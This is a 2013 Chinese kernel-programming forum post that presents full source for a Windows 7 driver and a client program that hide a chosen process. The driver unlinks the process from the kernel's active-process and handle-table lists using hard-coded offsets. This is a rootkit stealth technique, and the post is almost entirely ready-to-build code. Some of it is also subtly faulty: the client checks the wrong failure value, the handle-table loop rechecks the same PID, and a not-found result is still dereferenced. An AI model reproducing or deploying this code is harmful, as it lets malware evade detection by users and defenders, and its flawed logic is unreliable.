-
-
一个菜鸟的内核学习——Win7内核隐藏进程
-
发表于:
2013-5-10 22:51
19011
-
写了个WIN7隐藏驱动程序,不多说什么,贴代码,主要包括驱动程序和应用程序。
开发环境:win7+VS2012+WDK8.0
其他操作系统不支持
详情请看附件,大牛勿喷……
//驱动程序:
//*********************************
//fsjaky
//blog:http://blog.csdn.net/fsjaky
//*********************************
#include <ntddk.h>
typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
#define IOCTL_HIDE_PROCESS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_WRITE_ACCESS)
//偏移量
//win7
#define PIDOFFSET 0Xb4 //EPROCESS中UniqueProcessId偏移
#define FLINKOFFSET 0xb8 //EPROCESS中ActiveProcessLinks偏移
#define ObjectTable 0xf4 //EPROCESS中ObjectTable偏移
#define TableList 0x10 //ObjectTable中HandleTableList偏移
#define PIDOFFSET2 0x008 //ObjectTable中UniqueProcessId偏移
#define QuotaProcess 0x004 //ObjectTable中QuotaProcess偏移
PDEVICE_OBJECT g_Device = NULL;
const WCHAR LinkName[] = L"\\DosDevices\\MyHideProcess";
const WCHAR DriverName[] = L"\\Device\\MyHideProcess";
#define DebugPrint DbgPrint
DWORD g_Eprocess = 0x00000000; //
PLIST_ENTRY g_HandleList = NULL;
DWORD FindProcessInEPROCESS (int Hide_PID);
VOID FindProcessInHandleTable (DWORD eproc,int Hide_PID);
NTSTATUS MyDispatch(IN PDEVICE_OBJECT, IN PIRP);
NTSTATUS MyUnload(IN PDRIVER_OBJECT);
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
NTSTATUS ntStatus;
UNICODE_STRING DriverNameUnicodeString;
UNICODE_STRING DriverLinkUnicodeString;
DbgPrint ("DriverEntry\n");
RtlInitUnicodeString (&DriverNameUnicodeString, DriverName );
RtlInitUnicodeString (&DriverLinkUnicodeString, LinkName );
//创建设备
ntStatus = IoCreateDevice ( DriverObject, 0, // For driver extension
&DriverNameUnicodeString, FILE_DEVICE_UNKNOWN,
0,TRUE, &g_Device );
if( !NT_SUCCESS(ntStatus))
{
DebugPrint(("Failed to CreateDevice!\n"));
return ntStatus;
}
//创建符号链接
ntStatus = IoCreateSymbolicLink (&DriverLinkUnicodeString, &DriverNameUnicodeString );
if( !NT_SUCCESS(ntStatus))
{
DebugPrint(("Failed to CreateSymbolicLink!\n"));
return ntStatus;
}
DriverObject->MajorFunction[IRP_MJ_CREATE] = MyDispatch;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = MyDispatch;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = MyDispatch;
DriverObject->DriverUnload = MyUnload;
DbgPrint ("DriverEntry leave\n");
return STATUS_SUCCESS;
}
NTSTATUS MyUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING deviceLinkUnicodeString;
PDEVICE_OBJECT p_NextObj;
DbgPrint ("Start MyUnload\n");
p_NextObj = DriverObject->DeviceObject;
if (p_NextObj == NULL)
{
DbgPrint ("MyUnload Error\n");
return STATUS_SUCCESS;
}
else
{
RtlInitUnicodeString( &deviceLinkUnicodeString, LinkName );
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
IoDeleteDevice( DriverObject->DeviceObject );
}
DbgPrint ("End MyUnload\n");
return STATUS_SUCCESS;
}
NTSTATUS MyDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
NTSTATUS nStatus = STATUS_SUCCESS;
ULONG IoControlCode = 0;
PIO_STACK_LOCATION IrpStack = NULL;
long* inBuf = NULL;
char* outBuf = NULL;
ULONG inSize = 0;
ULONG outSize = 0;
PCHAR buffer = NULL;
NTSTATUS ntstatus = STATUS_SUCCESS;
int find_PID = 0;
DWORD eproc = 0x00000000;
DWORD start_eproc= 0x00000000;
PLIST_ENTRY plist_active_procs = NULL;
DbgPrint ("Start MyDispatch\n");
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
IrpStack = IoGetCurrentIrpStackLocation (Irp);
switch (IrpStack->MajorFunction) {
case IRP_MJ_CREATE:
break;
case IRP_MJ_SHUTDOWN:
break;
case IRP_MJ_CLOSE:
break;
case IRP_MJ_DEVICE_CONTROL:
IoControlCode = IrpStack->Parameters.DeviceIoControl.IoControlCode;
switch ( IoControlCode )
{
case IOCTL_HIDE_PROCESS:
inSize = IrpStack->Parameters.DeviceIoControl.InputBufferLength;
outSize = IrpStack->Parameters.DeviceIoControl.OutputBufferLength;
inBuf = (long*)Irp->AssociatedIrp.SystemBuffer;
if ((inSize < sizeof(DWORD)) || (inBuf == NULL))
{
DbgPrint("inBuf Error\n");
ntstatus = STATUS_INVALID_BUFFER_SIZE;
break;
}
find_PID = *((DWORD *)inBuf); //获得应用程序输入的PID
DbgPrint("The Input PID is :%d\r\n",find_PID);
eproc = FindProcessInEPROCESS(find_PID );// 在EPROCESS结构中找到这个进程
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
*((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink;
*((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;
//修改HandleList
// HandleTableList
FindProcessInHandleTable(eproc,find_PID );// 在HandleTableList中找到这个进程
*((DWORD *)g_HandleList->Blink) = (DWORD) g_HandleList->Flink;
*((DWORD *)g_HandleList->Flink+1) = (DWORD) g_HandleList->Blink;
break;
default:
break;
}
}
ntstatus = Irp->IoStatus.Status;
IoCompleteRequest( Irp, IO_NO_INCREMENT );
DbgPrint ("End MyDispatch\n");
return ntstatus;
}
DWORD FindProcessInEPROCESS (int Hide_PID)
{
DWORD eproc = 0x00000000;
int current_PID = 0;
int start_PID = 0;
int count = 0;
PLIST_ENTRY plist_active_procs;
DbgPrint ("Start FindProcessInEPROCESS\n");
if (Hide_PID == 0)
return Hide_PID;
//遍历ActiveList
eproc = (DWORD) PsGetCurrentProcess();
start_PID = *((DWORD*)(eproc+PIDOFFSET));
current_PID = start_PID;
DbgPrint("Start Search In ActiveList\n");
while(1)
{
if(Hide_PID == current_PID)
{
g_Eprocess = eproc;
DbgPrint("EPROCESS is %ld\n",g_Eprocess);
return eproc;
}
else if((count >= 1) && (start_PID == current_PID))
{
return 0x00000000;
}
else {
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
eproc = (DWORD) plist_active_procs->Flink;
eproc = eproc - FLINKOFFSET;
current_PID = *((int *)(eproc+PIDOFFSET));
count ++;
}
}
DbgPrint("End Search In ActiveList\n");
}
VOID FindProcessInHandleTable (DWORD eproc,int Hide_PID)
{
PLIST_ENTRY HandleTableList=NULL;
PLIST_ENTRY start_list = NULL;
int handle_PID = 0;
//遍历HanldeTable
DbgPrint("Start Search In HanldeTable\n");
HandleTableList=(PLIST_ENTRY)(*(PULONG)((ULONG)eproc+ObjectTable)+TableList);
start_list = HandleTableList;
do {
handle_PID = *(PULONG)(*(PULONG)((ULONG)eproc+ObjectTable)+PIDOFFSET2);
if(Hide_PID == handle_PID)
{
g_HandleList = HandleTableList;
break ;
}
HandleTableList = HandleTableList->Flink;
} while(start_list != HandleTableList);
DbgPrint("End Search In HanldeTable\n");
}
//应用程序
//*********************************
//fsjaky
//blog:http://blog.csdn.net/fsjaky
//*********************************
#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
#include<winioctl.h>
#define IOCTL_HIDE_PROCESS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_WRITE_ACCESS)
int main()
{
long pid = 0;
DWORD ReBytes = 0;
HANDLE hDevice;
hDevice = CreateFile("\\\\.\\MyHideProcess",
GENERIC_READ|GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if(hDevice == NULL)
{
printf("CreateFile Error %d\n",GetLastError());
}
printf("Please Input a PID to Hiden:");
scanf("%ld",&pid);
DeviceIoControl(hDevice,
IOCTL_HIDE_PROCESS,
&pid,
sizeof(long),
NULL,
0,
&ReBytes,
NULL);
CloseHandle(hDevice);
system("pause");
return 0;
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
